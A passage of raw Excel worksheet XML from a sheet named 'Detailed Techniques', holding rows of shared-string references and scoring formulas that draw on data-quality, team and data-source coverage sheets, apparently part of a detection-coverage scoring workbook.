        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F197&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F197))-LEN(SUBSTITUTE(TRIM(F197),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I197" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F197&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F197))-LEN(SUBSTITUTE(TRIM(F197),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J197" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F197&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F197))-LEN(SUBSTITUTE(TRIM(F197),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K197" s="51">
        <f t="shared" si="25"/>
        <v>0</v>
      </c>
    </row>
    <row r="198" spans="1:11" ht="270.75" x14ac:dyDescent="0.45">
      <c r="A198" s="8" t="s">
        <v>222</v>
      </c>
      <c r="B198" s="8" t="s">
        <v>1052</v>
      </c>
      <c r="C198" s="25" t="s">
        <v>1053</v>
      </c>
      <c r="D198" s="10" t="s">
        <v>1054</v>
      </c>
      <c r="E198" s="10" t="s">
        <v>1055</v>
      </c>
      <c r="F198" s="10" t="s">
        <v>1056</v>
      </c>
      <c r="G198" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K198,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H198" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F198&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F198))-LEN(SUBSTITUTE(TRIM(F198),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I198" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F198&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F198))-LEN(SUBSTITUTE(TRIM(F198),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J198" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F198&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F198))-LEN(SUBSTITUTE(TRIM(F198),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K198" s="51">
        <f t="shared" si="25"/>
        <v>0</v>
      </c>
    </row>
    <row r="199" spans="1:11" ht="409.5" x14ac:dyDescent="0.45">
      <c r="A199" s="8" t="s">
        <v>223</v>
      </c>
      <c r="B199" s="8" t="s">
        <v>1052</v>
      </c>
      <c r="C199" s="25" t="s">
        <v>1057</v>
      </c>
      <c r="D199" s="10" t="s">
        <v>1058</v>
      </c>
      <c r="E199" s="10" t="s">
        <v>1059</v>
      </c>
      <c r="F199" s="10" t="s">
        <v>1060</v>
      </c>
      <c r="G199" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K199,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H199" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F199&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F199))-LEN(SUBSTITUTE(TRIM(F199),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I199" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F199&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F199))-LEN(SUBSTITUTE(TRIM(F199),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J199" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F199&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F199))-LEN(SUBSTITUTE(TRIM(F199),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K199" s="51">
        <f t="shared" si="25"/>
        <v>0</v>
      </c>
    </row>
    <row r="200" spans="1:11" ht="171" x14ac:dyDescent="0.45">
      <c r="A200" s="8" t="s">
        <v>79</v>
      </c>
      <c r="B200" s="8" t="s">
        <v>10</v>
      </c>
      <c r="C200" s="25" t="s">
        <v>1061</v>
      </c>
      <c r="D200" s="10" t="s">
        <v>1062</v>
      </c>
      <c r="E200" s="10" t="s">
        <v>1063</v>
      </c>
      <c r="F200" s="10" t="s">
        <v>1064</v>
      </c>
      <c r="G200" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K200,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H200" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F200&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F200))-LEN(SUBSTITUTE(TRIM(F200),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I200" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F200&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F200))-LEN(SUBSTITUTE(TRIM(F200),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J200" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F200&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F200))-LEN(SUBSTITUTE(TRIM(F200),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K200" s="51">
        <f t="shared" si="25"/>
        <v>0</v>
      </c>
    </row>
    <row r="201" spans="1:11" ht="99.75" x14ac:dyDescent="0.45">
      <c r="A201" s="8" t="s">
        <v>89</v>
      </c>
      <c r="B201" s="8" t="s">
        <v>10</v>
      </c>
      <c r="C201" s="25" t="s">
        <v>1065</v>
      </c>
      <c r="D201" s="10" t="s">
        <v>1066</v>
      </c>
      <c r="E201" s="10" t="s">
        <v>1067</v>
      </c>
      <c r="F201" s="10" t="s">
        <v>1068</v>
      </c>
      <c r="G201" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K201,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H201" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F201&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F201))-LEN(SUBSTITUTE(TRIM(F201),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I201" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F201&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F201))-LEN(SUBSTITUTE(TRIM(F201),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J201" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F201&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F201))-LEN(SUBSTITUTE(TRIM(F201),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K201" s="51">
        <f t="shared" si="25"/>
        <v>0</v>
      </c>
    </row>
    <row r="202" spans="1:11" ht="270.75" x14ac:dyDescent="0.45">
      <c r="A202" s="8" t="s">
        <v>158</v>
      </c>
      <c r="B202" s="8" t="s">
        <v>4</v>
      </c>
      <c r="C202" s="25" t="s">
        <v>1069</v>
      </c>
      <c r="D202" s="10" t="s">
        <v>1070</v>
      </c>
      <c r="E202" s="10" t="s">
        <v>1071</v>
      </c>
      <c r="F202" s="10" t="s">
        <v>1072</v>
      </c>
      <c r="G202" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K202,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H202" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F202&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F202))-LEN(SUBSTITUTE(TRIM(F202),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I202" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F202&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F202))-LEN(SUBSTITUTE(TRIM(F202),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J202" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F202&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F202))-LEN(SUBSTITUTE(TRIM(F202),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K202" s="51">
        <f t="shared" si="25"/>
        <v>0</v>
      </c>
    </row>
    <row r="203" spans="1:11" ht="114" x14ac:dyDescent="0.45">
      <c r="A203" s="8" t="s">
        <v>225</v>
      </c>
      <c r="B203" s="8" t="s">
        <v>2</v>
      </c>
      <c r="C203" s="25" t="s">
        <v>1073</v>
      </c>
      <c r="D203" s="10" t="s">
        <v>1074</v>
      </c>
      <c r="E203" s="10" t="s">
        <v>1075</v>
      </c>
      <c r="F203" s="10" t="s">
        <v>1076</v>
      </c>
      <c r="G203" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K203,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H203" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F203&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F203))-LEN(SUBSTITUTE(TRIM(F203),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I203" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F203&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F203))-LEN(SUBSTITUTE(TRIM(F203),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J203" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F203&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F203))-LEN(SUBSTITUTE(TRIM(F203),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K203" s="51">
        <f t="shared" si="25"/>
        <v>0</v>
      </c>
    </row>
    <row r="204" spans="1:11" ht="409.5" x14ac:dyDescent="0.45">
      <c r="A204" s="8" t="s">
        <v>199</v>
      </c>
      <c r="B204" s="8" t="s">
        <v>6</v>
      </c>
      <c r="C204" s="25" t="s">
        <v>1077</v>
      </c>
      <c r="D204" s="10" t="s">
        <v>1078</v>
      </c>
      <c r="E204" s="10" t="s">
        <v>1079</v>
      </c>
      <c r="F204" s="10" t="s">
        <v>1080</v>
      </c>
      <c r="G204" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K204,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H204" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F204&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F204))-LEN(SUBSTITUTE(TRIM(F204),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I204" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F204&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F204))-LEN(SUBSTITUTE(TRIM(F204),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J204" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F204&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F204))-LEN(SUBSTITUTE(TRIM(F204),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K204" s="51">
        <f t="shared" si="25"/>
        <v>0</v>
      </c>
    </row>
    <row r="205" spans="1:11" ht="213.75" x14ac:dyDescent="0.45">
      <c r="A205" s="8" t="s">
        <v>202</v>
      </c>
      <c r="B205" s="8" t="s">
        <v>6</v>
      </c>
      <c r="C205" s="25" t="s">
        <v>1081</v>
      </c>
      <c r="D205" s="10" t="s">
        <v>1082</v>
      </c>
      <c r="E205" s="10" t="s">
        <v>1083</v>
      </c>
      <c r="F205" s="10" t="s">
        <v>1084</v>
      </c>
      <c r="G205" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K205,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H205" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F205&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F205))-LEN(SUBSTITUTE(TRIM(F205),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I205" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F205&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F205))-LEN(SUBSTITUTE(TRIM(F205),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J205" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F205&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F205))-LEN(SUBSTITUTE(TRIM(F205),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K205" s="51">
        <f t="shared" si="25"/>
        <v>0</v>
      </c>
    </row>
    <row r="206" spans="1:11" ht="199.5" x14ac:dyDescent="0.45">
      <c r="A206" s="8" t="s">
        <v>172</v>
      </c>
      <c r="B206" s="8" t="s">
        <v>1085</v>
      </c>
      <c r="C206" s="25" t="s">
        <v>1086</v>
      </c>
      <c r="D206" s="10" t="s">
        <v>1087</v>
      </c>
      <c r="E206" s="10" t="s">
        <v>1088</v>
      </c>
      <c r="F206" s="10" t="s">
        <v>1089</v>
      </c>
      <c r="G206" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K206,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H206" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F206&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F206))-LEN(SUBSTITUTE(TRIM(F206),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I206" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F206&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F206))-LEN(SUBSTITUTE(TRIM(F206),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J206" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F206&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F206))-LEN(SUBSTITUTE(TRIM(F206),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K206" s="51">
        <f t="shared" si="25"/>
        <v>0</v>
      </c>
    </row>
    <row r="207" spans="1:11" ht="313.5" x14ac:dyDescent="0.45">
      <c r="A207" s="8" t="s">
        <v>195</v>
      </c>
      <c r="B207" s="8" t="s">
        <v>1</v>
      </c>
      <c r="C207" s="25" t="s">
        <v>1090</v>
      </c>
      <c r="D207" s="10" t="s">
        <v>1091</v>
      </c>
      <c r="E207" s="10" t="s">
        <v>1092</v>
      </c>
      <c r="F207" s="10" t="s">
        <v>1093</v>
      </c>
      <c r="G207" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K207,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H207" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F207&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F207))-LEN(SUBSTITUTE(TRIM(F207),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I207" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F207&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F207))-LEN(SUBSTITUTE(TRIM(F207),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J207" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F207&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F207))-LEN(SUBSTITUTE(TRIM(F207),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K207" s="51">
        <f t="shared" si="25"/>
        <v>0</v>
      </c>
    </row>
    <row r="208" spans="1:11" ht="399" x14ac:dyDescent="0.45">
      <c r="A208" s="8" t="s">
        <v>227</v>
      </c>
      <c r="B208" s="8" t="s">
        <v>2</v>
      </c>
      <c r="C208" s="25" t="s">
        <v>1094</v>
      </c>
      <c r="D208" s="10" t="s">
        <v>1095</v>
      </c>
      <c r="E208" s="10" t="s">
        <v>1096</v>
      </c>
      <c r="F208" s="10" t="s">
        <v>1097</v>
      </c>
      <c r="G208" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K208,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H208" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F208&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F208))-LEN(SUBSTITUTE(TRIM(F208),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I208" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F208&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F208))-LEN(SUBSTITUTE(TRIM(F208),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J208" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F208&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F208))-LEN(SUBSTITUTE(TRIM(F208),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K208" s="51">
        <f t="shared" si="25"/>
        <v>0</v>
      </c>
    </row>
    <row r="209" spans="1:11" ht="228" x14ac:dyDescent="0.45">
      <c r="A209" s="8" t="s">
        <v>164</v>
      </c>
      <c r="B209" s="8" t="s">
        <v>3</v>
      </c>
      <c r="C209" s="25" t="s">
        <v>1098</v>
      </c>
      <c r="D209" s="10" t="s">
        <v>1099</v>
      </c>
      <c r="E209" s="10" t="s">
        <v>1100</v>
      </c>
      <c r="F209" s="10" t="s">
        <v>1101</v>
      </c>
      <c r="G209" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K209,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H209" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F209&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F209))-LEN(SUBSTITUTE(TRIM(F209),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I209" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F209&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F209))-LEN(SUBSTITUTE(TRIM(F209),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J209" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F209&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F209))-LEN(SUBSTITUTE(TRIM(F209),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K209" s="51">
        <f t="shared" si="25"/>
        <v>0</v>
      </c>
    </row>
    <row r="210" spans="1:11" ht="213.75" x14ac:dyDescent="0.45">
      <c r="A210" s="8" t="s">
        <v>224</v>
      </c>
      <c r="B210" s="8" t="s">
        <v>0</v>
      </c>
      <c r="C210" s="25" t="s">
        <v>1102</v>
      </c>
      <c r="D210" s="10" t="s">
        <v>1103</v>
      </c>
      <c r="E210" s="10" t="s">
        <v>1104</v>
      </c>
      <c r="F210" s="10" t="s">
        <v>1105</v>
      </c>
      <c r="G210" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K210,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H210" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F210&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F210))-LEN(SUBSTITUTE(TRIM(F210),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I210" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F210&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F210))-LEN(SUBSTITUTE(TRIM(F210),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J210" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F210&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F210))-LEN(SUBSTITUTE(TRIM(F210),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K210" s="51">
        <f t="shared" si="25"/>
        <v>0</v>
      </c>
    </row>
    <row r="211" spans="1:11" ht="285" x14ac:dyDescent="0.45">
      <c r="A211" s="8" t="s">
        <v>159</v>
      </c>
      <c r="B211" s="8" t="s">
        <v>5</v>
      </c>
      <c r="C211" s="25" t="s">
        <v>1106</v>
      </c>
      <c r="D211" s="10" t="s">
        <v>1107</v>
      </c>
      <c r="E211" s="10" t="s">
        <v>1108</v>
      </c>
      <c r="F211" s="10" t="s">
        <v>1109</v>
      </c>
      <c r="G211" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K211,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H211" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F211&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F211))-LEN(SUBSTITUTE(TRIM(F211),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I211" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F211&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F211))-LEN(SUBSTITUTE(TRIM(F211),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J211" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F211&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F211))-LEN(SUBSTITUTE(TRIM(F211),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K211" s="51">
        <f t="shared" si="25"/>
        <v>0</v>
      </c>
    </row>
    <row r="212" spans="1:11" ht="171" x14ac:dyDescent="0.45">
      <c r="A212" s="8" t="s">
        <v>228</v>
      </c>
      <c r="B212" s="8" t="s">
        <v>2</v>
      </c>
      <c r="C212" s="25" t="s">
        <v>1110</v>
      </c>
      <c r="D212" s="10" t="s">
        <v>1111</v>
      </c>
      <c r="E212" s="10" t="s">
        <v>1112</v>
      </c>
      <c r="F212" s="10" t="s">
        <v>1109</v>
      </c>
      <c r="G212" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K212,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H212" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F212&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F212))-LEN(SUBSTITUTE(TRIM(F212),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I212" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F212&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F212))-LEN(SUBSTITUTE(TRIM(F212),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J212" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F212&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F212))-LEN(SUBSTITUTE(TRIM(F212),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K212" s="51">
        <f t="shared" si="25"/>
        <v>0</v>
      </c>
    </row>
    <row r="213" spans="1:11" ht="128.25" x14ac:dyDescent="0.45">
      <c r="A213" s="8" t="s">
        <v>170</v>
      </c>
      <c r="B213" s="8" t="s">
        <v>3</v>
      </c>
      <c r="C213" s="25" t="s">
        <v>1113</v>
      </c>
      <c r="D213" s="10" t="s">
        <v>1114</v>
      </c>
      <c r="E213" s="10" t="s">
        <v>1115</v>
      </c>
      <c r="F213" s="10" t="s">
        <v>1116</v>
      </c>
      <c r="G213" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K213,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H213" s="51">
